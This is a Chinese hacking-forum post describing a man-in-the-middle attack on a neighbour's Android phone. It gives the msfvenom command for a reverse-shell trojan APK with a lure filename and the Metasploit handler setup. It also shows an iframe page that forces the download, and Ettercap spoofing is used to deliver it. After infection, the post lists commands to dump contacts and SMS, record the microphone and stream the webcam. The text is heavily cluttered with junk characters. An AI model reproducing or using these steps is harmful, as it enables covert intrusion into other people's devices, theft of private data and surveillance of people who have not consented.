找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2308|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

$ k7 z# T" _0 c6 }7 A 五、msf+ettercap入侵邻居安卓手机 - B$ C$ H" B' W" _0 H- B2 F. l: n, a

, \$ I/ t1 \5 N

; B4 ?. o$ x5 P4 w6 ]: _1 i 首先启动msf : d2 y) w% H2 ~& i7 K1 Y

) F" v) z6 I+ q4 M i4 g

3 |3 m3 Q" `: H: L; u3 ~ 先用kali生成一个安卓木马,如下命令: 2 x5 ]9 ^4 n) |/ {* R0 P

% J3 O7 y+ D7 Y) m8 c2 F5 J2 {( T

4 F8 E5 h& p5 E; p Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : y7 p2 H4 y7 u+ i

4 f9 a+ c9 |! |! D* [, g& K

- [# Q# l) |/ [1 l& O7 A9 a 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 9 k( B6 p# L0 a# [1 j; F4 r

$ U! ?8 ]1 E) i C

6 W" D ]* A7 x9 q, P2 l 然后进入msf ( M$ L. U( \/ [" Z! C5 C

& ]! R$ ~5 o5 |+ l

7 f |5 I, G* R- t! R use exploit/multi/handler * U* K1 P3 b9 R% ?

' ?, l* E, I# |" @

& d1 B' E. Z+ S" a4 V set payload android/meterpreter/reverse_tcp * c8 f4 J- s6 p& P- z8 X* g

9 ^3 _+ ^+ {& R9 b

8 \. g' }7 P" D: u( m' a& n set LHOST 192.168.0.109 //ipkailiip 3 X- J8 s/ a8 w- z! N9 ]% I

, O' \+ w2 n1 N

; _( k0 `% G8 u set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / f5 H6 l/ K) A

' c5 [) `% x5 t9 J; w1 ?/ A

( i* T0 @) @. x& B+ k4 T9 Z1 j Exploit , s: c, t7 @ a" E

$ Q: _ @: ?" R; F6 Y3 p, f

3 T6 R8 Q: ~( D9 k4 i   8 v& a7 p" N9 \! t A: C9 M

. C! j' w' d, V( Q

1 S E0 m0 E8 V- b$ X, V# h! d 下面我们开启ettercap -G 6 e: a8 c* H- j" y3 H

$ t2 r1 N/ k2 A4 B

3 a- g p" O& t 我物理IP & p# c* s3 L8 B! [+ _3 {1 C

( V8 A1 E0 M" B8 T; M

/ H2 Q( N a9 L! I& O+ Z0 i   4 ^# T4 k. E/ j6 ^3 x c. O& }2 I8 ?0 Z

5 V# q1 M. P4 i

1 ?9 ^. D6 U, J& {! Y, _ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 7 q5 G- h0 K4 \- K2 M- K7 L

4 B# w) y# m) m: ?0 p. _

8 q0 c/ r) m% b7 Z, }9 G1 r 下面我们来设置一下 3 o" u6 k3 f0 B2 `

2 Y3 Y$ {9 O$ J

4 r" [5 Y& B4 T8 G, r% ^/ T   5 v' F( g. g# x. u( p! E

0 x& U5 \8 E |6 o5 @4 G( Z

6 d: N+ f- k/ M! O, c, p* H0 @% \' y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , n# K* F6 b* e/ X9 N1 {' c

( A( y0 K: m: ~- O

3 g+ N1 C7 S; e) H/ h8 G   i/ G* A o: q, @

7 \: ^& P( I% k. S5 }

+ _% J3 k5 s% j* {/ ~8 k   2 j. g& _! ]9 Z ?) T: i+ `

3 W/ v8 Q3 y3 k0 B8 ?5 I- E

( O2 e5 i9 I& }7 v# J* Q3 J   , k" e) J$ Q/ d8 G# x: G5 N7 G

0 R# O5 r4 z+ S( S. y! \" e5 Y& [

2 n# N. d+ ^' C   ) B9 j- f2 g! E. a9 i& p) p

s0 ^. M; X. E0 L6 R1 n; r) M c

. C1 O3 K6 y$ t- X7 V" D   ( M; K; k9 b2 Q; S

2 \# z+ W5 v7 v

" A1 \. y$ Z2 Z: p( r/ o n& H   H2 E' C% k3 F/ e- G

! M% K0 @9 e) o9 s. z9 p

: [5 i# x: f- X5 w+ d y9 |4 K& r' o   " t8 ^; W0 a4 Z3 M! p: Q7 o e

2 ?% _3 ]' l+ Z8 I& u

' L9 P( k" a+ G: A   9 d# n6 b4 E6 O( M, @

! @" `7 d: w$ F

5 \: d9 ~4 `% I4 P* x. v& [$ O   8 Z* }9 w0 u3 O

: T( q# r2 H, x% b8 k1 w

. g1 o; ~% A7 i/ o, S# P. A   # i3 q9 [" ~; T+ Q

) h- T0 I! C* w: Z/ }

. m; t* i% [* p/ P8 V1 R% e   & d' [3 w. X8 S# ~1 q( x# P+ p \

, K) n. o# F% o0 u: d( E

; _- `, P3 P; Z+ G# \/ S& Z& p. V8 k   # W0 V+ \" }1 u; q

3 U5 R0 a, ~0 p A. E

4 M6 Y* j/ }; |3 _5 l5 }   7 q* W5 z3 B, m6 b( d0 [

* j# f2 t T8 S/ ~3 F2 o8 H2 y; U/ n

& B' s) a" L# R: i* z 下面我们开始攻击 : n% ]9 n; ?+ C! a. P" ?

' F: }: {: s& i. [5 g0 D

2 I" r" D5 z6 Z# ^0 i+ F! }# C   " \9 l4 d8 W2 ]5 O

% F# B4 x: h2 E- E

3 g* k- `0 t3 ~) }   " N" Y: H# @* W7 `: D

, P5 {( j4 K, j& e" c0 a% |) G

9 L4 `# Z# v, O   7 F1 o4 d! G# Y' ^

, T5 x: x) P& X- U& N4 I

: X7 E, w/ K* q8 s5 o: ]) `   / {2 W6 B% t- s0 F+ n- c$ a

F- R: Q& k0 Q) I4 b( ]" o

3 r5 L6 b1 b- I- c. X) ? @9 g' V   5 q$ m% a# F* t7 L0 ~

0 S8 B+ B# ^: d, `$ q+ [

8 S. z, W4 [1 k4 R* U7 S 大概过了5分钟多,发现反弹成功了 ( [, N) n7 x3 b Q B+ K4 C* L

% }' A1 Q7 K# Q1 ]$ J1 J% Y' C

/ Z5 t9 K6 q" r: G   ! Q: J* O- ?# z: H( u8 l

8 M" C5 L$ ?4 |% y4 a4 i# L

L: H. Q/ q0 n+ S/ v) C   ! e; o" z1 Z6 d+ d

. q$ Y; J9 P3 U, O5 B9 e5 {

; s! |( Y. k0 Z5 h   6 [% D; N1 R' b3 k$ x6 _

8 k; F: Z0 d5 o

! k, L8 e3 b$ ~/ ~   1 A" B- g" v9 U0 V" r9 Q6 F

4 Z2 ~, T+ B) x' a, K

5 h" W" S- g( w   / y, I: V8 v: Y/ Q, z6 @

4 h) A+ R! ]" |! U8 d

9 k$ I$ j, i6 B. k5 k   ( t K4 e0 H7 i) Y

' _. D/ K1 q- L' v' `

0 p' x% F7 C0 `6 Z( }" w+ z0 s! O   ; ~0 x) l; _ F& O

4 T: e) ?" Z" H6 Z! s( `1 T& n4 o

+ `' f3 h2 D$ c/ E2 U, c4 u 执行命令 + w7 \+ @ X, ~9 f+ [) p

$ y5 h A( {( D0 c2 s+ K

7 k; U) r2 w% X. T' g( w' D   ( M3 }' v- Z& ^$ |& E* U

) w+ n8 b* F! G, V( n% v+ c$ ^. A

i! h n- \ U) M9 P ^ dump_contacts    --》这个是导出电话 ) b- X. f. Z: Q$ c \

+ a; h8 b/ ~9 n5 p( O

# B8 g/ b+ r$ Q dump_sms --》这个是导出信息 ; s" W9 e( L5 q

5 A% i( s" p8 v

' r Y- g2 a A0 Y2 S/ d6 O1 p record_mic     Record audio from the default microphone for X seconds f2 T# \ g& t! ?/ G3 N

i6 a) {9 D3 y

2 y( {1 p" z; M3 f1 }9 v y     webcam_chat    Start a video chat 6 Q% s. a Z( H# P

5 P. d8 B2 j, I/ x/ d% T

0 ?3 v5 ]' U- s9 f3 v     webcam_list    List webcams ) p: M4 z' P; Z$ O7 ]

! ~4 `! Y8 S% v. A) u, W

) t9 J8 C5 F4 W9 H3 t     webcam_snap    Take a snapshot from the specified webcam 5 Y- A1 c+ J) K: u% P

. J+ b$ B8 o9 t' g8 r: O% k

0 [7 h1 q- R/ d; u: J/ ^7 x webcam_stream  lay a video stream from the specified webcam . C$ N* o2 U% I% W& S: [* _

$ B9 E! P& ?# c2 H- o+ S- I( R

# H* y% `% r! V' |4 e# n! O   ( B! g) m9 {" k# D- E0 k/ G( Q" h

6 I0 O5 \3 P2 a1 S; _, N) h

+ O2 U8 t0 c4 ?# r   0 C5 B: X' y4 `! U. i. R7 O

$ t+ X$ Z2 t% H

! k3 E# {. _0 P, t2 D; a 我们打开看一下电话薄, $ E1 M. k" |& Z

g T, }1 W6 W' ^$ d, M; J

$ I% k4 `( N6 q( V/ F7 A   ) y1 `0 Z- V. Q0 M$ ^6 l

% }2 C% y3 B5 V3 z! \

* X% ^6 C1 i! i   4 x7 B' |1 U k7 K

8 r% Z) T% f" I7 G! S; J

) V8 s6 m( Z8 t   & H- m3 N7 z- f, [

! v. M1 I& |; Y& s9 j

% }- K" v; `8 H6 A0 H   $ u. ^2 n4 p- Q! H: z. W8 p- z

3 B, W: `+ y8 R6 ~( v

/ I) o3 s0 f& j5 c, c, i   m# B, U+ K' \9 C6 C! P

% ?8 L+ }: L) J' `/ r* i; m: [7 H

: X f! D* @$ O   # o i/ S* s( a5 R

/ z9 Z3 s" j7 G1 H8 H+ h

5 Q! A# L" J4 [/ _! k0 n 我们同时欺骗成DroidJack木马,使用方法如图: # {; h% j7 r7 }4 E& m

2 G+ I% | l$ f$ w8 p

# F: D) ?' n' } N: f   ( w# {8 P( I3 [' S) }

$ a& L! e+ f/ {0 r0 P& r) M

" t# n8 e: O7 h2 y" y _. Z$ h   $ `0 j2 u+ @0 B z2 a: x* A1 y

' X9 s1 g4 S9 p$ [

9 s1 {, H! M% J/ M* h   ; _! Q, x3 \# M8 H. v2 F( T

' }3 |, }! M8 o' m* i. S, D/ K3 j

a2 M$ J. x1 B6 `7 o 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 , x4 c2 Q. \4 N% V) A

. F8 t: D7 b1 O( v

; |; ^! A0 s2 n% F5 C; q2 T0 [( f' o   8 b! `, _# {" r3 f2 u& E

/ ^; Q; e1 p. O8 O; v. K

2 z- `, Q, J' s& T   ; Z4 N; T; b7 t! o& A

0 |) i' i( q9 E- \1 i; M& M) w

_1 x) o) i. T- [   $ }* [3 T5 G7 U/ S. r `+ `

4 @) p" X# B- R

/ s9 p1 ~5 X$ K% b 2 g# Q- P: f+ Z) L& D2 B# Q

8 ^ ^5 E, _$ N

- ~+ m) l+ U3 ^
( _$ A! o% r+ i1 U4 r

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表